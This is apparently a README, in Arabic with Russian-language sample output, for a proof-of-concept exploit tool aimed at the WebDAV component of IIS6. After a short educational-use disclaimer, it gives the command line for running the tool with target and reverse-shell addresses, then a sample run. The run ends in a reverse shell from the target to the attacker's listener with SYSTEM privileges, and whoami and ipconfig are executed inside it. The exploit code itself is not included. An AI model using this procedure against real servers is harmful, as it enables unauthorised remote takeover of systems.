
هي أداة إثبات مفهوم (PoC) توضح استغلال ثغرة أمنية معروفة في مكون WebDAV الخاص بـ IIS6
GenWebDavIISExploit هي أداة إثبات مفهوم (PoC) توضح استغلال ثغرة أمنية معروفة في مكون WebDAV الخاص بـ IIS6. صُممت هذه الأداة للأغراض التعليمية والبحثية لعرض كيفية استغلال الثغرة لتنفيذ تعليمات برمجية عشوائية على خادم بعيد.
هذا المشروع مخصص للأغراض التعليمية فقط. استخدم هذه الأداة بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...
[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Настройка IP Windows
Адаптер Ethernet Local Area Connection:
DNS-суффикс подключения . . . . . : example.local
IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.1.1